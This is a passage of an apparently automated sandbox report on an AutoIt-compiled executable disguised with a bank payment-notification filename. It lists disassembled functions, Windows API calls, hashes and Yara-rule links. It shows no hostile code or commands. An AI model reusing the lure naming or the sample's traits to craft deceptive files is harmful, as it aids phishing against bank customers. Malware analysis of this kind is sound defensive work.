                                                                                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 0045C20E
                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 0045C226
                                                                                                                                                    • KillTimer.USER32(?,0000040A), ref: 0045C242
                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0045C25C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3741023627-0
                                                                                                                                                    • Opcode ID: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
                                                                                                                                                    • Instruction ID: 1cbdf9da880a683b58ffeaf16326a4f2222d3a7c74a558aa9ab436c5b6b9af77
                                                                                                                                                    • Opcode Fuzzy Hash: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
                                                                                                                                                    • Instruction Fuzzy Hash: DF0167309047049BEB205B54DD8EB9A7778BB00706F000ABEB942A15E1DBF8699DDB59
                                                                                                                                                    Function 004013B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • EndPath.GDI32(?), ref: 004013BF
                                                                                                                                                    • StrokeAndFillPath.GDI32(?,?,0043B888,00000000,?), ref: 004013DB
                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 004013EE
                                                                                                                                                    • DeleteObject.GDI32 ref: 00401401
                                                                                                                                                    • StrokePath.GDI32(?), ref: 0040141C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2625713937-0
                                                                                                                                                    • Opcode ID: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
                                                                                                                                                    • Instruction ID: 52848d70ea624aaff4fbf1a8dc35ad1b05fe5f58837c3e038025b123c59b5ab6
                                                                                                                                                    • Opcode Fuzzy Hash: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
                                                                                                                                                    • Instruction Fuzzy Hash: E9F01930000A08EFDB516F26EC4CB5D3BA4A741326F188639E829981F1CB3459A9DF28
                                                                                                                                                    Function 00412CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                                                                                                                      • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                                                                                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                      • Part of subcall function 00407A51: _memmove.LIBCMT ref: 00407AAB
                                                                                                                                                    • __swprintf.LIBCMT ref: 00412ECD
                                                                                                                                                    Strings
                                                                                                                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00412D66
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                                    • API String ID: 1943609520-557222456
                                                                                                                                                    • Opcode ID: 5b139b7899ef4289eb0da42df0e051edacc54e873cf318611a8c5f8ee7684cf0
                                                                                                                                                    • Instruction ID: 5fa1cbf72f49bdff47ddac1708762697048697bfe45d30711dc422f43ccdaf03
                                                                                                                                                    • Opcode Fuzzy Hash: 5b139b7899ef4289eb0da42df0e051edacc54e873cf318611a8c5f8ee7684cf0
                                                                                                                                                    • Instruction Fuzzy Hash: AF91AD716083119FD714EF25D985CAFB7A8EF85314F00482FF441AB2A2DA78ED85CB5A
                                                                                                                                                    Function 0045B2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 0045B4BE
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ContainedObject
                                                                                                                                                    • String ID: AutoIt3GUI$Container$%I
                                                                                                                                                    • API String ID: 3565006973-4251005282
                                                                                                                                                    • Opcode ID: 5ed104d2ff18c61b51a34f9361201fb114687c1fd7afa2c461df9e804e7132e4
                                                                                                                                                    • Instruction ID: 7009c248d49ee490af6c5c3a89f60ad5612698b65dddc7868321d046ba5149c9
                                                                                                                                                    • Opcode Fuzzy Hash: 5ed104d2ff18c61b51a34f9361201fb114687c1fd7afa2c461df9e804e7132e4
                                                                                                                                                    • Instruction Fuzzy Hash: E6915B70200605AFDB14DF64C884B6ABBE5FF49705F20856EED46CB392EB74E845CBA4
                                                                                                                                                    Function 0042501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 004250AD
                                                                                                                                                      • Part of subcall function 004300F0: __87except.LIBCMT ref: 0043012B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorHandling__87except__start
                                                                                                                                                    • String ID: pow
                                                                                                                                                    • API String ID: 2905807303-2276729525
                                                                                                                                                    • Opcode ID: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
                                                                                                                                                    • Instruction ID: 06df28618b400316a62ebb5dd7aba5b0962afb7cd5aceff72fbc56c90cb9ae17
                                                                                                                                                    • Opcode Fuzzy Hash: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
                                                                                                                                                    • Instruction Fuzzy Hash: 20518B20B0C50186DB217B24ED2137F2B909B44700F608AABE4D5863AADE3D8DD4DB8E
                                                                                                                                                    Function 00448584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID: 3cA$_A
                                                                                                                                                    • API String ID: 4104443479-3480954128
                                                                                                                                                    • Opcode ID: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
                                                                                                                                                    • Instruction ID: c37b5588275ae9a3f9bfbb083816e01235b481b2fd059d6d91eac45173b7304a
                                                                                                                                                    • Opcode Fuzzy Hash: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
                                                                                                                                                    • Instruction Fuzzy Hash: 24516B70E006199FDB64CF68C880AAEBBB1FF44304F14852EE85AD7350EB39A995CB55
                                                                                                                                                    Function 004873D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00487461
                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00487475
                                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00487499
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Window
                                                                                                                                                    • String ID: SysMonthCal32
                                                                                                                                                    • API String ID: 2326795674-1439706946
                                                                                                                                                    • Opcode ID: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
                                                                                                                                                    • Instruction ID: a782af31bde95408328e4f00c38aa01da76ea549d3e2a3982252f7da8ca2871c
                                                                                                                                                    • Opcode Fuzzy Hash: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
                                                                                                                                                    • Instruction Fuzzy Hash: CD21D032100218BBDF11DFA4CC42FEE3B69EB48724F210615FE156B190DA79EC918BA4
                                                                                                                                                    Function 00486CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00486D3B
                                                                                                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00486D4B
                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00486D70
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$MoveWindow
                                                                                                                                                    • String ID: Listbox
                                                                                                                                                    • API String ID: 3315199576-2633736733
                                                                                                                                                    • Opcode ID: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
                                                                                                                                                    • Instruction ID: 4c3adc306d008ae433eb9b24af907097c824bc429f4b76309dac7fd9fc57b361
                                                                                                                                                    • Opcode Fuzzy Hash: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
                                                                                                                                                    • Instruction Fuzzy Hash: 0B21F232600118BFEF129F54CC45FAF3BBAEF89750F028529F940AB2A0C675AC5197A4
                                                                                                                                                    Function 00426B71 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __calloc_crt
                                                                                                                                                    • String ID: K$@BL
                                                                                                                                                    • API String ID: 3494438863-2209178351
                                                                                                                                                    • Opcode ID: 1dcb651b5103459d55ad6e63b5153fbe911c496dbbbddd92234eb52377e23d61
                                                                                                                                                    • Instruction ID: ecd99e2cd8c25bd978de89897c730db32a1f4afae71c84053b65a056749c41d4
                                                                                                                                                    • Opcode Fuzzy Hash: 1dcb651b5103459d55ad6e63b5153fbe911c496dbbbddd92234eb52377e23d61
                                                                                                                                                    • Instruction Fuzzy Hash: 13F0A4713056318BE7A48F15BC51E9A6BD4EB40334F91006BE504CE280EB38B8818A9C
                                                                                                                                                    Function 00404C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00404BD0,?,00404DEF,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404C11
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00404C23
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                    • API String ID: 2574300362-3689287502
                                                                                                                                                    • Opcode ID: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
                                                                                                                                                    • Instruction ID: 336b7b4d781913fc81d88f89c4603830af099844575e0fd289a57b9d24372fc6
                                                                                                                                                    • Opcode Fuzzy Hash: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
                                                                                                                                                    • Instruction Fuzzy Hash: 21D08C70500712CFD7206F70D90830BB6D5AF08352B118C3E9481D2690E6B8D8808728
                                                                                                                                                    Function 00404C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00404B83,?), ref: 00404C44
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00404C56
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                    • API String ID: 2574300362-1355242751
                                                                                                                                                    • Opcode ID: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
                                                                                                                                                    • Instruction ID: 94e8dd0119df68c591ce1b6916bf7291aa534648892bae55459e1f5a441e7c38
                                                                                                                                                    • Opcode Fuzzy Hash: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
                                                                                                                                                    • Instruction Fuzzy Hash: 05D0C270500713CFD7206F31C80830A72D4AF00351B218C3F9591D62A8E678D8C0C728
                                                                                                                                                    Function 00480DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00481039), ref: 00480DF5
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00480E07
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                    • API String ID: 2574300362-4033151799
                                                                                                                                                    • Opcode ID: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
                                                                                                                                                    • Instruction ID: d6bbf1028a7b4fc64c7871010167997e003500dc78b62918f38a53d73d50c6ba
                                                                                                                                                    • Opcode Fuzzy Hash: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
                                                                                                                                                    • Instruction Fuzzy Hash: ACD08231560322DFC320AF70C80838B72E4AF04342F208C3E9582C2250E6B8D8948B28
                                                                                                                                                    Function 004790E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00478CF4,?,0048F910), ref: 004790EE
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00479100
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
